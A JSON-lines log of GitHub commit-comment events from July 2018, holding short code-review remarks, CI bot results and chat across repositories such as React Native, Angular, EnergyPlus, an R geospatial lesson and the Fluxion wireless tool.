{"id":"7953833525","type":"CommitCommentEvent","actor":{"login":"antang98"},"repo":{"name":"antang98/hello-world"},"payload":{"comment":{"id":29679926,"position":null,"line":null,"path":null,"commit_id":"f5b12c8419e8a66b3f0dbaa5b8fb577c1bda18cf","created_at":"2018-07-12T04:09:23Z","updated_at":"2018-07-12T04:09:23Z","author_association":"OWNER","body":"testing 2"}},"created_at":"2018-07-12T04:09:23Z"}
{"id":"7953837385","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29679931,"position":443,"line":37,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"38615d886168086d49421712cc7b283043b5214f","created_at":"2018-07-12T04:10:57Z","updated_at":"2018-07-12T04:10:57Z","author_association":"OWNER","body":"I reflowed everything to 80 characters wide so most of the change highlighting doesn't mean much. I'll comment on the main changes."}},"created_at":"2018-07-12T04:10:57Z"}
{"id":"7953839846","type":"CommitCommentEvent","actor":{"login":"svj-ssncse"},"repo":{"name":"SSN-CSE/me-cse-2018"},"payload":{"comment":{"id":29679937,"position":null,"line":null,"path":null,"commit_id":"931dbe91b0c2841c7662d6e61def3b83cdb1150a","created_at":"2018-07-12T04:12:02Z","updated_at":"2018-07-12T04:12:02Z","author_association":"NONE","body":"Duplication of exercise at the end"}},"created_at":"2018-07-12T04:12:02Z"}
{"id":"7953840021","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18021/programming-term2"},"payload":{"comment":{"id":29679938,"position":null,"line":null,"path":null,"commit_id":"5cd4c350a5f9abdda4f9a952522dc08d0e074499","created_at":"2018-07-12T04:12:06Z","updated_at":"2018-07-12T04:12:06Z","author_association":"NONE","body":"数字以外の入力に耐えられていて、結果の部分だけを差し替えて表示出来ているので、いいコードですね。\r\nただ、入力が1,2,3の場合に、グーチョキパー以外の部分が繰り返しコーディングされています。\r\nメッセージ全体をもう1個別の変数に持たせて、format()メソッドで部分置き換えしたほうが、もう少しスッキリすると個人的には思います。"}},"created_at":"2018-07-12T04:12:06Z"}
{"id":"7953840998","type":"CommitCommentEvent","actor":{"login":"Yoonix83"},"repo":{"name":"Yoonix83/SpringStudy"},"payload":{"comment":{"id":29679940,"position":null,"line":null,"path":null,"commit_id":"92059c4f466a7e4c2e3e81067f2d8fdd5ba1734a","created_at":"2018-07-12T04:12:31Z","updated_at":"2018-07-12T04:12:31Z","author_association":"OWNER","body":"앞으로 src/필기노트 안에 txt 파일을 첨부 할 것이다."}},"created_at":"2018-07-12T04:12:31Z"}
{"id":"7953847537","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29679959,"position":null,"line":null,"path":null,"commit_id":"c4a66a89a28152cd4b81e2b0f80ab3aac34d6872","created_at":"2018-07-12T04:15:20Z","updated_at":"2018-07-12T04:15:20Z","author_association":"COLLABORATOR","body":"@Kureev This seems to be causing a few issues for me, looks like we're not passing assetRegistryPath anymore which causes an error. Also it looks like we don't add the middlewares anymore, or I don't understand how. `middlewareManager` isn't passed to the http server started by metro.\r\n\r\nI'm currently investigating CI failure and it fails to detect that the packager started because the /status endpoint doesn't exist."}},"created_at":"2018-07-12T04:15:20Z"}
{"id":"7953847568","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29679961,"position":null,"line":null,"path":null,"commit_id":"20ad2fe62b755be90dea8bb3d09b6d83433b5ee8","created_at":"2018-07-12T04:15:21Z","updated_at":"2018-07-12T04:15:21Z","author_association":"NONE","body":"整数以外の入力に耐えられていますね。確認しました。\r\n修正お疲れ様です。"}},"created_at":"2018-07-12T04:15:21Z"}
{"id":"7953854543","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29679971,"position":137,"line":130,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"b23416a1ccea5e75ef6290478ebe74b90a1a4b98","created_at":"2018-07-12T04:18:26Z","updated_at":"2018-07-12T04:18:26Z","author_association":"OWNER","body":"this is corrected in a subsequent commit"}},"created_at":"2018-07-12T04:18:26Z"}
{"id":"7953855234","type":"CommitCommentEvent","actor":{"login":"neilo6000"},"repo":{"name":"neilo6000/User-Signup"},"payload":{"comment":{"id":29679973,"position":null,"line":null,"path":null,"commit_id":"36e9d4412ccf231a3f23801e3ddfeec467927491","created_at":"2018-07-12T04:18:47Z","updated_at":"2018-07-12T04:18:47Z","author_association":"OWNER","body":"Temp file only\r\n"}},"created_at":"2018-07-12T04:18:47Z"}
{"id":"7953855862","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29679974,"position":null,"line":null,"path":null,"commit_id":"ae2c9f02cf8886c0457599c1179931bff1dfeda1","created_at":"2018-07-12T04:19:05Z","updated_at":"2018-07-12T04:19:05Z","author_association":"NONE","body":"整数以外の入力にも耐えられていますので、結果OKですね。\r\nただ、要求仕様の「変数2つ以上」を満たしていないようです。\r\n僕の場合ですが、6,8,10行目のメッセージをifステートメントの前に1つの変数に持っておいて、ifステートメントの条件判断内で、format()メソッドでグー、チョキ、パーの文だけ書き換えると思います。"}},"created_at":"2018-07-12T04:19:05Z"}
{"id":"7953859498","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29679979,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:20:42Z","updated_at":"2018-07-12T04:20:42Z","author_association":"MEMBER","body":"This broke way too many things."}},"created_at":"2018-07-12T04:20:42Z"}
{"id":"7953861991","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29679987,"position":5,"line":7,"path":"fluxion.sh","commit_id":"b615cf7d094f221f2c51b3ac246e2487e850a7f0","created_at":"2018-07-12T04:21:50Z","updated_at":"2018-07-12T04:21:50Z","author_association":"MEMBER","body":"Path names need to be quoted."}},"created_at":"2018-07-12T04:21:50Z"}
{"id":"7953877272","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29680018,"position":232,"line":249,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"b23416a1ccea5e75ef6290478ebe74b90a1a4b98","created_at":"2018-07-12T04:28:34Z","updated_at":"2018-07-12T04:28:34Z","author_association":"OWNER","body":"I've moved this section up from the end as plots in the next section use multiband data"}},"created_at":"2018-07-12T04:28:34Z"}
{"id":"7953877983","type":"CommitCommentEvent","actor":{"login":"KV9801"},"repo":{"name":"PotatoDevices/device_oneplus_oneplus3"},"payload":{"comment":{"id":29680020,"position":null,"line":null,"path":null,"commit_id":"33c73bd632aa3fb44956e2f9bb4997ea36caa4a2","created_at":"2018-07-12T04:28:54Z","updated_at":"2018-07-12T04:28:54Z","author_association":"NONE","body":"Kernel repo is not public :|"}},"created_at":"2018-07-12T04:28:54Z"}
{"id":"7953879081","type":"CommitCommentEvent","actor":{"login":"roypatel1"},"repo":{"name":"roypatel1/maven-project"},"payload":{"comment":{"id":29680024,"position":null,"line":null,"path":null,"commit_id":"562895895a5be4fa86a4f18c0fdb9e73599d96ae","created_at":"2018-07-12T04:29:25Z","updated_at":"2018-07-12T04:29:25Z","author_association":"OWNER","body":"renamed"}},"created_at":"2018-07-12T04:29:25Z"}
{"id":"7953882616","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29680031,"position":294,"line":298,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"b23416a1ccea5e75ef6290478ebe74b90a1a4b98","created_at":"2018-07-12T04:30:55Z","updated_at":"2018-07-12T04:30:55Z","author_association":"OWNER","body":"This might need to be talked about - static plots of spatial data are often better constructed from simplified versions of the source data, as they will never be printed large enough for the loss of detail to be noticed. Any actual analysis still needs to be done on the original, unaltered data."}},"created_at":"2018-07-12T04:30:55Z"}
{"id":"7953884325","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29680035,"position":298,"line":302,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"b23416a1ccea5e75ef6290478ebe74b90a1a4b98","created_at":"2018-07-12T04:31:39Z","updated_at":"2018-07-12T04:31:39Z","author_association":"OWNER","body":"The above might need to be talked about - static plots of spatial data are often better constructed from simplified versions of the source data, as they will never be printed large enough for the loss of detail to be noticed. Any actual analysis still needs to be done on the original, unaltered data."}},"created_at":"2018-07-12T04:31:39Z"}
{"id":"7953885825","type":"CommitCommentEvent","actor":{"login":"ChristianGrieger"},"repo":{"name":"nimiq-network/mining-pool"},"payload":{"comment":{"id":29680039,"position":null,"line":null,"path":null,"commit_id":"ad3bb071b5aaf7278427f885e41775aab9069042","created_at":"2018-07-12T04:32:18Z","updated_at":"2018-07-12T04:32:18Z","author_association":"NONE","body":"This change always ends up in:\r\n\r\nPoolPayout: Stored payins are greater than the payable block reward for block ...\r\n\r\nAny idea on how to get it working?"}},"created_at":"2018-07-12T04:32:18Z"}
{"id":"7953886719","type":"CommitCommentEvent","actor":{"login":"indiesquidge"},"repo":{"name":"scwood/dotfiles"},"payload":{"comment":{"id":29680042,"position":19,"line":32,"path":"UltiSnips/javascript.snippets","commit_id":"ed420dfb8914a5f337877bc281b711af135ecff8","created_at":"2018-07-12T04:32:40Z","updated_at":"2018-07-12T04:32:40Z","author_association":"NONE","body":"🌝 "}},"created_at":"2018-07-12T04:32:40Z"}
{"id":"7953887943","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29680043,"position":360,"line":340,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"b23416a1ccea5e75ef6290478ebe74b90a1a4b98","created_at":"2018-07-12T04:33:14Z","updated_at":"2018-07-12T04:33:14Z","author_association":"OWNER","body":"Instructors may wish to point out that scale_fill_identity is what you use when the fill parameter specifies the exact colours."}},"created_at":"2018-07-12T04:33:14Z"}
{"id":"7953888298","type":"CommitCommentEvent","actor":{"login":"Zorrototo"},"repo":{"name":"OpenGamePanel/OGP-Website"},"payload":{"comment":{"id":29680044,"position":18,"line":40,"path":"lang/Arabic/modules/TS3Admin.php","commit_id":"5e18115a1611bfe5702d4c4b620535201b8c8499","created_at":"2018-07-12T04:33:22Z","updated_at":"2018-07-12T04:33:22Z","author_association":"CONTRIBUTOR","body":"Why did you ignore the big warning on Transifex telling you that there was a problem with your translation?\r\nThis line is wrong and will not work as intended.\r\nThe '%1' was important it was not just '1'.. '%1' or '%2' and so on are replaced with something and yours line will not, so fix that on Transifex in order to not have a broken string."}},"created_at":"2018-07-12T04:33:22Z"}
{"id":"7953888647","type":"CommitCommentEvent","actor":{"login":"Zorrototo"},"repo":{"name":"OpenGamePanel/OGP-Website"},"payload":{"comment":{"id":29680045,"position":19,"line":41,"path":"lang/Arabic/modules/TS3Admin.php","commit_id":"5e18115a1611bfe5702d4c4b620535201b8c8499","created_at":"2018-07-12T04:33:31Z","updated_at":"2018-07-12T04:33:31Z","author_association":"CONTRIBUTOR","body":"Why did you ignore the big warning on Transifex telling you that there was a problem with your translation?\r\nThis line is wrong and will not work as intended.\r\nThe '%1' was important it was not just '1'.. so fix that on Transifex in order to not have a broken string."}},"created_at":"2018-07-12T04:33:31Z"}
{"id":"7953888808","type":"CommitCommentEvent","actor":{"login":"meenaidde"},"repo":{"name":"meenaidde/mydb"},"payload":{"comment":{"id":29680047,"position":6,"line":6,"path":"corejava/src/basic/Overloading.java","commit_id":"7e2b9fbabe800718e6684d95728b5c32e2cddc98","created_at":"2018-07-12T04:33:36Z","updated_at":"2018-07-12T04:33:36Z","author_association":"OWNER","body":"method overloading"}},"created_at":"2018-07-12T04:33:36Z"}
{"id":"7953889248","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29680049,"position":null,"line":null,"path":null,"commit_id":"c4a66a89a28152cd4b81e2b0f80ab3aac34d6872","created_at":"2018-07-12T04:33:48Z","updated_at":"2018-07-12T04:33:48Z","author_association":"COLLABORATOR","body":"Okay I think I fixed it 🙃 https://github.com/facebook/react-native/pull/20162"}},"created_at":"2018-07-12T04:33:48Z"}
{"id":"7953889564","type":"CommitCommentEvent","actor":{"login":"tonny008"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29680051,"position":6,"line":24,"path":"packages/platform-browser/test/dom/dom_renderer_spec.ts","commit_id":"6c55a130b15c02677fcc708dcd686d22a6412fce","created_at":"2018-07-12T04:33:56Z","updated_at":"2018-07-12T04:33:56Z","author_association":"NONE","body":"this one should be shadowdom?"}},"created_at":"2018-07-12T04:33:56Z"}
{"id":"7953889989","type":"CommitCommentEvent","actor":{"login":"eastman1014"},"repo":{"name":"eastman1014/FinishSlick"},"payload":{"comment":{"id":29680054,"position":null,"line":null,"path":null,"commit_id":"c2be3ac7749b16dff796d96e89ffc7fd1361f2e7","created_at":"2018-07-12T04:34:09Z","updated_at":"2018-07-12T04:34:09Z","author_association":"OWNER","body":"commit summary"}},"created_at":"2018-07-12T04:34:09Z"}
{"id":"7953891693","type":"CommitCommentEvent","actor":{"login":"tonny008"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29680057,"position":6,"line":24,"path":"packages/platform-browser/test/dom/dom_renderer_spec.ts","commit_id":"6c55a130b15c02677fcc708dcd686d22a6412fce","created_at":"2018-07-12T04:34:54Z","updated_at":"2018-07-12T04:34:54Z","author_association":"NONE","body":"CmpEncapsulationShadow?"}},"created_at":"2018-07-12T04:34:54Z"}
{"id":"7953893840","type":"CommitCommentEvent","actor":{"login":"obrl-soil"},"repo":{"name":"obrl-soil/r-raster-vector-geospatial"},"payload":{"comment":{"id":29680058,"position":396,"line":372,"path":"_episodes_rmd/01-raster-structure.Rmd","commit_id":"b23416a1ccea5e75ef6290478ebe74b90a1a4b98","created_at":"2018-07-12T04:35:53Z","updated_at":"2018-07-12T04:35:53Z","author_association":"OWNER","body":"new example for deliberately plotting NA values above plus discussion of setting NA manually"}},"created_at":"2018-07-12T04:35:53Z"}
{"id":"7953895528","type":"CommitCommentEvent","actor":{"login":"ExtraConcentratedJuice"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29680060,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T04:36:36Z","updated_at":"2018-07-12T04:36:36Z","author_association":"OWNER","body":"set \"EnableCatchResponse\" to false to stop the response messages\r\n\r\n\"OwnerID\": \"youridhere\" should not include the quotes on \"youridhere\""}},"created_at":"2018-07-12T04:36:36Z"}
{"id":"7953896333","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680061,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-12T04:36:58Z","updated_at":"2018-07-12T04:36:58Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T04:36:58Z"}
{"id":"7953898619","type":"CommitCommentEvent","actor":{"login":"Cap32"},"repo":{"name":"cantonjs/claypot-wxapp-auth-plugin"},"payload":{"comment":{"id":29680064,"position":58,"line":92,"path":"src/index.js","commit_id":"6668d1f6af7e3e4ee1bf8d9e6e326b1d1f60c23e","created_at":"2018-07-12T04:38:00Z","updated_at":"2018-07-12T04:38:00Z","author_association":"MEMBER","body":"Should add default payload by `{ [_signKey]: openid }`?"}},"created_at":"2018-07-12T04:38:00Z"}
{"id":"7953899687","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680067,"position":62,"line":107,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:38:29Z","updated_at":"2018-07-12T04:38:29Z","author_association":"MEMBER","body":"This is using two test commands rather than one, which is why I didn't use it in the first place. The original way was using only one test call."}},"created_at":"2018-07-12T04:38:29Z"}
{"id":"7953902186","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680071,"position":154,"line":488,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:39:34Z","updated_at":"2018-07-12T04:39:34Z","author_association":"MEMBER","body":"This isn't working on Kali at all, the xterm is as small as it can get."}},"created_at":"2018-07-12T04:39:34Z"}
{"id":"7953903394","type":"CommitCommentEvent","actor":{"login":"DemonWav"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":29680072,"position":null,"line":null,"path":null,"commit_id":"7bb3f45ce126185a63a66e0c8f20f0f2de798797","created_at":"2018-07-12T04:40:07Z","updated_at":"2018-07-12T04:40:07Z","author_association":"MEMBER","body":"I cba to test this, and will happily take it back if I'm wrong - and I know this is somewhat hot code - but I am pretty confident this will provide only a measurable performance improvement, with no significant improvement in performance in general. "}},"created_at":"2018-07-12T04:40:07Z"}
{"id":"7953906300","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680077,"position":80,"line":236,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:41:19Z","updated_at":"2018-07-12T04:41:19Z","author_association":"MEMBER","body":"These aren't clearing the screen, which causes the banner to scroll by, and I think the banner look silly in the middle of the screen."}},"created_at":"2018-07-12T04:41:19Z"}
{"id":"7953906415","type":"CommitCommentEvent","actor":{"login":"Hideyuki-Yamashita"},"repo":{"name":"ntt-ns/spp"},"payload":{"comment":{"id":29680080,"position":null,"line":null,"path":null,"commit_id":"947345b3716cadcf29439c7b25309834477d75cd","created_at":"2018-07-12T04:41:22Z","updated_at":"2018-07-12T04:41:22Z","author_association":"CONTRIBUTOR","body":"確認しました。コメントはありません。"}},"created_at":"2018-07-12T04:41:22Z"}
{"id":"7953906972","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680082,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-12T04:41:37Z","updated_at":"2018-07-12T04:41:37Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T04:41:37Z"}
{"id":"7953907148","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680083,"position":183,"line":571,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:41:43Z","updated_at":"2018-07-12T04:41:43Z","author_association":"MEMBER","body":"This is a bug."}},"created_at":"2018-07-12T04:41:43Z"}
{"id":"7953907433","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29680085,"position":null,"line":null,"path":null,"commit_id":"b0ae481f23d975aff485816c107a6b4c4f7d2709","created_at":"2018-07-12T04:41:50Z","updated_at":"2018-07-12T04:41:50Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-update-s](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-update-s).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-update-s-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T04:41:50Z"}
{"id":"7953910145","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680089,"position":202,"line":594,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:43:04Z","updated_at":"2018-07-12T04:43:04Z","author_association":"MEMBER","body":"This is a bug."}},"created_at":"2018-07-12T04:43:04Z"}
{"id":"7953913852","type":"CommitCommentEvent","actor":{"login":"RieksJ"},"repo":{"name":"sovrin-foundation/protocol"},"payload":{"comment":{"id":29680095,"position":16,"line":22,"path":"README.md","commit_id":"486c85b80bd8cf3342f48105594114990663b775","created_at":"2018-07-12T04:44:45Z","updated_at":"2018-07-12T04:44:45Z","author_association":"NONE","body":"Yes. Note that her friends can also act as a producer, e.g. of credentials. When people start issuing credentials to one another, that puts Alice in a position where she can show credentials issued by government, banks etc. to her employer, and to her friends, she would show credentials issued by other friends. This comes natural when we view identity in this mulitfaceted way."}},"created_at":"2018-07-12T04:44:45Z"}
{"id":"7953913960","type":"CommitCommentEvent","actor":{"login":"trotyl"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29680096,"position":19,"line":19,"path":"CHANGELOG.md","commit_id":"b9e095aa31f0706307fb4633ccd02b645b915d6b","created_at":"2018-07-12T04:44:48Z","updated_at":"2018-07-12T04:44:48Z","author_association":"CONTRIBUTOR","body":"Any reason for adding a feature in patch version?"}},"created_at":"2018-07-12T04:44:48Z"}
{"id":"7953918111","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680108,"position":245,"line":956,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:46:36Z","updated_at":"2018-07-12T04:46:36Z","author_association":"MEMBER","body":"Bug by outdated documentation."}},"created_at":"2018-07-12T04:46:36Z"}
{"id":"7953918879","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680110,"position":282,"line":1222,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:46:54Z","updated_at":"2018-07-12T04:46:54Z","author_association":"MEMBER","body":"This is a bug."}},"created_at":"2018-07-12T04:46:54Z"}
{"id":"7953927442","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29680122,"position":208,"line":599,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T04:50:50Z","updated_at":"2018-07-12T04:50:50Z","author_association":"MEMBER","body":"All of these are bugs due to outdated documentation."}},"created_at":"2018-07-12T04:50:50Z"}
{"id":"7953927628","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29680123,"position":null,"line":null,"path":null,"commit_id":"f564833fda44e715f61fe9c5e34e521a7ddc1882","created_at":"2018-07-12T04:50:55Z","updated_at":"2018-07-12T04:50:55Z","author_association":"CONTRIBUTOR","body":"> Okay, so should we add it back?\r\n\r\nAbsent any information about a change in the situation, yes, the revision of maxima (and maxima-devel, now that it exists) should be increased, because the version of sbcl changed.\r\n\r\nSee https://github.com/macports/macports-ports/pull/2181"}},"created_at":"2018-07-12T04:50:55Z"}
{"id":"7953927698","type":"CommitCommentEvent","actor":{"login":"jkleiber"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29680124,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-12T04:50:57Z","updated_at":"2018-07-12T04:50:57Z","author_association":"CONTRIBUTOR","body":"@Dancopy, Aehmlo has good advice. Please open an issue and we can continue the discussion there"}},"created_at":"2018-07-12T04:50:57Z"}
{"id":"7953932856","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":29680135,"position":null,"line":null,"path":null,"commit_id":"4cfb47da8db493bac90feb8e60a4063a28a288e7","created_at":"2018-07-12T04:53:15Z","updated_at":"2018-07-12T04:53:15Z","author_association":"MEMBER","body":"Did you test that, also with arrays?"}},"created_at":"2018-07-12T04:53:15Z"}
{"id":"7953934824","type":"CommitCommentEvent","actor":{"login":"benrstraw"},"repo":{"name":"UCF-CMR/CubeSat-WTC"},"payload":{"comment":{"id":29680136,"position":4,"line":148,"path":"WTC_Libs/stateMachine/stateMachine.c","commit_id":"8ac99b77db6ac31015d6c8c4268587b10e76eaba","created_at":"2018-07-12T04:54:06Z","updated_at":"2018-07-12T04:54:06Z","author_association":"MEMBER","body":"Didn't catch this, thanks!"}},"created_at":"2018-07-12T04:54:06Z"}
{"id":"7953937049","type":"CommitCommentEvent","actor":{"login":"ferrouswheel"},"repo":{"name":"cvdfoundation/open-images-dataset"},"payload":{"comment":{"id":29680139,"position":null,"line":null,"path":null,"commit_id":"39756643c6f6f52c0fe141d10c57fc9cf3e09305","created_at":"2018-07-12T04:55:01Z","updated_at":"2018-07-12T04:55:01Z","author_association":"NONE","body":"For those of us that are partway through syncing the training data from Google Storage - will it remain available?\r\n\r\nI'm also curious in general what the reason for the switch is. Cheaper to host on S3 or are more people training models in AWS?"}},"created_at":"2018-07-12T04:55:01Z"}
{"id":"7953937686","type":"CommitCommentEvent","actor":{"login":"kwangrok92"},"repo":{"name":"tbop02/algorithm"},"payload":{"comment":{"id":29680140,"position":null,"line":null,"path":null,"commit_id":"5c6beb7ef2fa9f5a39e2bc4070b20d245fee8753","created_at":"2018-07-12T04:55:17Z","updated_at":"2018-07-12T04:55:17Z","author_association":"COLLABORATOR","body":"Hyun soo ha go sip eun go da hae"}},"created_at":"2018-07-12T04:55:17Z"}
{"id":"7953941132","type":"CommitCommentEvent","actor":{"login":"hyunsoo92"},"repo":{"name":"tbop02/algorithm"},"payload":{"comment":{"id":29680142,"position":null,"line":null,"path":null,"commit_id":"5c6beb7ef2fa9f5a39e2bc4070b20d245fee8753","created_at":"2018-07-12T04:56:48Z","updated_at":"2018-07-12T04:56:48Z","author_association":"COLLABORATOR","body":"나 왜이렇게 잘생겼지..\r\n"}},"created_at":"2018-07-12T04:56:48Z"}
{"id":"7953944979","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"kconrado/kkowalski_2nd_repository"},"payload":{"comment":{"id":29680148,"position":34,"line":34,"path":"src/main/java/com/crud/tasks/service/SimpleEmailService.java","commit_id":"fcf82cecc8f3fceff92ab2734d611d319b9e04a5","created_at":"2018-07-12T04:58:36Z","updated_at":"2018-07-12T04:58:36Z","author_association":"NONE","body":"Ustawianie mailTo, subject oraz text powinno być poza ifem.\r\nW ifie tylko to, co może powodować błąd czyli CC. Dodatkowo sprawdź czy mail.getToCc jest różne od nulla, takie sprawdzenie powinno odbyć się przed wywołaniem metody isEmpty (może być w tym samym warunku)"}},"created_at":"2018-07-12T04:58:36Z"}
{"id":"7953949648","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29680158,"position":null,"line":null,"path":null,"commit_id":"7e439efce306533e003648752db28903d35fa053","created_at":"2018-07-12T05:00:36Z","updated_at":"2018-07-12T05:00:36Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/7e439efce306533e003648752db28903d35fa053/index.html"}},"created_at":"2018-07-12T05:00:36Z"}
